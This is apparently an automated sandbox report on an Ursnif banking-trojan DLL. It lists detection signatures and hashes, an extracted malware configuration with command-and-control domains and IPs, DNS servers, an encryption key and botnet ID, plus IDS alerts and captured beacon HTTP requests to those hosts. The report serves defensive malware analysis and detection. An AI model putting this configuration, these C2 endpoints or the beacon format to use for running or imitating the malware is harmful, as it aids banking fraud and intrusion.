Windows Analysis Report 2790000.dll

Overview

General Information

Sample Name: 2790000.dll
Analysis ID: 444655
MD5: c40709736c45151601de6db50f379d8b
SHA1: 96fcdac225106f13726477d898a4939ccfcd4781
SHA256: 56b998448c4cd2240edcf0446c8bc7da54f4568ba99d1f3774c43af202aac995
Tags: dll
Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2790000.dll Avira: detected
Found malware configuration
Source: 00000007.00000002.936762270.00000000033D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "uiTXezezuapGKYR5Hmb7kdSK6au8TKB7wW9g5rwW5i1COxT1S+zuTy9YoTvI7hEm3kZdxYsJDG0+aStAKO8pzy41ZgWbaYpVgP+XSgAT7qWoXdAS/gVbMTJCCqNHkAtniUmHicelSYpHYminzht/W5i+89jC9sbo8vwV/qG0cnCdraqUqpCPQT4N25ybpFXm", "c2_domain": ["cdp.geotrust.com", "217.12.221.28", "195.123.247.51", "195.123.213.89", "qpwoeirutyzmxncbp2.xyz", "pqowieurytalskdjp2.xyz", "wopqrituysakldfap2.xyz"], "dns_server": ["107.174.86.134", "107.175.127.22"], "DGA_count": "10", "ip_check_url": ["api.wipmania.com", "ipinfo.io/ip"], "server": "12", "serpent_key": "10291029JSRABBIT", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "120", "time_value": "120", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "120", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "120", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "120", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5456", "capture_window_title?(CRC_KEYLOGLIST)": "", "SetWaitableTimer_value": "60"}
Machine Learning detection for sample
Source: 2790000.dll Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.10000000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Source: 7.2.rundll32.exe.10000000.4.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses 32bit PE files
Source: 2790000.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.20.250.115:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.180.206:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49862 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.87:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.59:443 -> 192.168.2.4:49873 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49874 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.54:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown HTTPS traffic detected: 82.165.229.16:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002C.00000002.886760710.0000026782F50000.00000002.00000001.sdmp, csc.exe, 00000036.00000002.914710159.00000138B0E20000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbXP* source: powershell.exe, 0000002F.00000002.962874378.00000251AFDE2000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889958591.0000000004330000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.942501146.0000000006560000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdb source: powershell.exe, 0000002F.00000002.962727249.00000251AFD82000.00000004.00000001.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.pdbl\ModuleAnalysisCache.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 0000002F.00000002.935651242.00000251AA29E000.00000004.00000020.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462FEC2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_0462FEC2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_04639F9E FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_04639F9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462F8CE wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_0462F8CE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0462FD33 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 3_2_0462FD33

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49782 -> 40.97.116.82:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49866 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49868 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49878 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49880 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49882 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49884 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49886 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49888 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49893 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49894 -> 45.90.58.179:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49896 -> 45.90.58.179:80
Performs DNS queries to domains with low reputation
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe DNS query: taybhctdyehfhgthp2.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.97.144.178 52.97.144.178
Source: Joe Sandbox View IP Address: 40.101.81.146 40.101.81.146
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GREENFLOID-ASUA GREENFLOID-ASUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /jdraw/4TWYD_2BKnV08xS5_/2F7HOCZrKwN0/4Zpub6ftuB_/2BizrVf_2BAEup/ooDnvqHPfcHYlzHuUeiq_/2BOcpQ3mscYC5ZQS/bCsofKuPGmQwD_2/FVd5R5hEPIiJUNt23U/AcieANSDJ/mLDV7I5LTSGIHgpcJd6S/EuKELXcxsS6HB64bzGC/Qm4swXvWNsxPSQQ_2B6aDm/9BguH_2BrAi/sCi.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: outlook.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jdraw/hRJbHpe2NUnd/Fqb6HJaKW_2/FkOSHsbbOjgHBf/KmDpJnEWchUKTqeK6k0hw/2AQJw6Tfj2Wghg40/cDBy1qgsd1Bh7XA/8XTTdRafkqQVGKHltr/VPRzK_2FJ/vWFbmfMAYjdSfOaB_2Fb/Hhjr_2BzU1ZKuqO0buX/LCyXURXRCX4qhBBiB401RQ/MfqjvWezuBF_2/FVb574obq_/2Bf0.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jdraw/senUH03QWJY9zy0TGKst3cx/OBC4WplDXH/oqcxDz6cjN7h_2F8d/LfQkFQ_2Fy0T/FAoEVOXxiKp/e5g4BIHVUHnefb/KqKdZd97vSsTK6buJ9MPp/9jx2EzrYaeeWP1ma/erE06KdAoUvLcED/U3KE1nRYvwMMSqnPv9/1aDo6f8tR/MrfKrfcn0yaSbhv8m_2F/z2V0PdyA0_2FVLnznN3/BN9K6zV1nJnb/WmUYG.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: PHPSESSID=oj5lijodqe611lf3pm8jatk5p5; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/nCtz8Lq6aEDL_2BsA7Qn5/Dev5sCookYywtQ9z/nG7suU6eaLynJDf/6nVlQrTedw14SsFLaP/dONDpCANh/eFyKJLQSVfXFPwoYfc_2/Fxcw2VZX7ufzKzV_2B_/2BcmZDAxHE9PqdJN_2FqrA/xpLUjN90HazXC/umw6oByt/_2BMDLnSdL9xoOnOquolygh/AYKttn5cY4/7XRs5_2FBpnYMuiL1/LLL0Aa3xG7M/waJBx6.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/P4wQs6220jnbtlIYjS/M_2BrTOFK/S5ZrWVsOjLJpN_2FedVX/CBkwP5kzII66fKYw3z_/2FjIng5PhqmFkUxpfJCyXT/oTx8Wl7oZau6V/473q3ztH/dQPwZCOMD_2BpYilPiiz4nZ/uZIwiZ0fko/kjMIGTqZ5JCk_2FS0/Gy_2FwKsvZXz/cjy_2FkTVRx/BwPtRyW55ulGu6/1jq9nBFzw/u.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/E8g7ocQa8Jp_2FkJKDIXto/jGrpKFGFm3zEl/pc9Bin_2/BMwThN1Xs8wlqXtLb7cKLtC/SgG36jLoe_/2F65aot9fOJ0PDXBC/hsoWNxn2X_2B/Y6w_2BH_2FO/I1GK6y1TlNcZL2/398IfCwmPSzVTZlSZ3ktc/prVDzQkMHshmRKXt/2UqbNyiak3Vc0V_/2FJ6G0D_2F90GG7ZcC/Q_2FC1PCI/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/DA9CpuaF1ChJieGGmxekNIf/_2Bf5dRFGl/6ha6ihRMMP4_2FTPW/uuFq9TAcj8h4/qSnVVL6dcdH/5B0njoQO8HRJ4A/GcUxJA_2B5IFHeGazw9j9/9KKhiR_2FNDslKNn/XvL5Nb3D7Leowhe/18j3DbadW1d4jdR2RZ/_2B6y0eTA/dUCR_2BcVc2Ddna9_2Fk/A65RCh8ja7G/kzkCTcCF/r.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/zTjbj3kKOaJ_2FHCn/EBB0ghxmT2zf/tZbW0q1dqvV/yVEV1RDmPsuUHe/9FIX_2FieCFBsfpbW1K38/dHn_2BX1vT0rKAiB/QFi0KmjZl6PH4uf/JNL9yHWEao1Jw7Ayug/0ksp4OzRe/qPXlFslPx8Je_2BMuBBh/SGrx7lyKyPKvXD05bnd/0JGzLedhoE7YtvlNRDW9VB/Smf6dY.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/YfhAKSrZ_/2B_2FjO_2BEfGkA859_2/BmcHGy0Exj8cPI6312d/hMFhmCvKYhGzWSE_2F3JZz/aqG_2Fo0JgK7b/IpJP6WZQ/EwJ0P5ojrmoHc7KEeUKS_2F/dr_2FAQUA2/1o9m_2FVWjRUIwasm/FW5sGJpTKtUf/M_2FEcpAeM7/B8jNam9JQ5TnKP/12F_2FHiebPKRmxJQmXnR/gGjhIMF_2FS7t5KV/L.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/RLbbZoqov27/RZXl47dw7WS2hD/qIyj2qjQipAh2ErH6xoal/uDkYECdj5jTgffUh/mYJ2XVA9rwPHUy2/QjwrTGMY_2F64PN_2F/YUDgMw7p1/s2t1KKiFVgqn2ZlMG_2B/D9NyHTdv3F0qdbbbGle/lx_2BPHRlHmFCQVN9dlzs4/OJpccJSrSanUR/bzsZAfU_/2BqRTtL2elDx7sY/V.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/SeHkUEUxsMZP1AhS/3IlboRjollxufxg/k0C1fYozGaNykNILuY/7mbt1CT39/8yuLSdKM2t03HpRX2_2F/fjGqyiYIkzVmY7BL2T3/lJeut6ngXNw7Xsle3Ac_2F/uCeLuklVXJGPS/OHU0EBrz/suKxF4Ft_2BK7qPRfzoyHnN/GhDiNtOZSu/bj6BgaSC_2FhnYL1W/3sMLu_2F/RiRf.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/1n_2BflhePO/uMnCopo6qdTrYV/FWhAJA9XLeWgIwqNDciEV/Ma2pywOVrVC7gojv/E6T3hs07V6KYbye/xvW81IAf7IZHKKI_2B/RArbctFfL/2TGsfNIzn81_2FbGpeyH/ukdp1ZDGefO14nBo8EX/nrPB_2FBmNloUapimH_2FE/RWs6DX_2B2Z0G/i8D3YZuF/j1ldvh1CQhgEI/V37EE.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/TMw5yrrD58_2F_2BhR/g9tx6WwiG/Y4ETyUqNXMfs0pkiHuVm/dVQuHu9BK38oq2QYF9z/cuTLQ3u7OqALxMIyfbyNQp/gDWpeOrsyYhNN/ao8vL_2F/3dQ2wCKcTWt3EGgjtWuBFvo/JER9x_2Bw_/2FiyK5UBn9x3lTG4i/wyJNOkM0xfPY/bTj1Bitzmn0/D5CG_2FPtjEkzq/cTayMyn_2/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: global traffic HTTP traffic detected: GET /jdraw/pBKH4QNe_/2BwOCg1mW3gHfkXlroYv/qwMSGdzvy41rio90Pee/xoNO_2FGsX6HBf_2FeDJF5/0Zm4ko6Y_2B7F/5nkQ7CLE/x6UrnmgoKHXkC63igNAKiIM/Lhtzb27hq2/jm8Q2hap4uiXv4gmQ/mKxqFGYK_2BR/j5HJqnO7p7O/6C_2B0biaTD1w9/N2tivlNu2ujN1Xlxq5iZI/v2iFk.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: taybhctdyehfhgthp2.xyzConnection: Keep-AliveCookie: lang=en; PHPSESSID=oj5lijodqe611lf3pm8jatk5p5
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000002F.00000003.894371427.00000251C410A000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, rundll32.exe, 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, control.exe, 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000002F.00000002.963318861.00000251BBCC1000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000002F.00000002.938114563.00000251ABE5F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
